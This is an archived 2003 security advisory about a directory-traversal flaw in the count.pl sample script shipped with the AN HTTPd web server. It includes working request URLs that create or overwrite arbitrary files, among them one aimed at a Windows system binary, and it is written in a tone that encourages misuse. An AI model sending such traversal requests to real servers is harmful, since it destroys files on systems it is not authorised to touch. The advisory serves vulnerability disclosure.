exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ANHTTPd.txt

ANHTTPd.txt
Posted Apr 22, 2003
Authored by Matthew Murphy

AN HTTPd versions 1.42h and prior ships with a script called count.pl which allows remote attackers to use a directory traversal attack to overwrite the contents of files on the system.

tags | exploit, remote
SHA-256 | a74b48909192b5c91b042611f88dcec0fb0d56626236be2a2851014e83d805c1

ANHTTPd.txt

Change Mirror Download
Product Description

AN HTTPd is a relatively small, powerful web server designed for Windows
systems. It supports ISAPI, CGI, SSI, and several other powerful
technologies (such as isolated worker processes) usually only seen in
production servers. More information on AN HTTPd is available at
http://www.st.rim.or.jp/~nakata/

Vulnerability Description

AN HTTPd (1.42h and prior) ships with several sample scripts demonstrating
various interpreters the server is capable of using. One of these,
"count.pl", is deployed in the "/isapi" virtual directory. It takes the
query string as part of a file path, which it uses as a page counter. AN
HTTPd does not check for directory traversals, and also does not prevent
non-numeric data from being used as counters.

Issuing the following request:
http://www.somesite.com/isapi/count.pl?../../../../../../../../../../../../.
./../../../../../../../../../ctr.dll

Will place "ctr.dll" in the root of C: with a "1" as its contents. This
same trick also works on writable files that already exist. An effective
patch for this vulnerability is to issue the following request:

http://www.somesite.com/isapi/count.pl?count.pl

This will destroy the vulnerable component, preventing further exploitation.
Be nice, kiddies :-D

Some nastier stuff:

http://www.somesite.com/isapi/count.pl?../../../../../../../../../../../../.
./../../../../../../../../../windows/system32/calc.exe

You get the idea...

Impact

Attackers can overwrite any file that the CGI user can access (this userid
is SYSTEM by default if running as a service, or the user running the binary
if in GUI mode -- usually an administrator). Contents of the destroyed
files cannot be sufficiently controlled to allow for exploitation in most
cases, as the file is replaced with numeric data.

Solution

Remove this crappy sample script, and write a web counter that uses
centralized configuration. The exploit shown above will remove this file
from a vulnerable system.

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close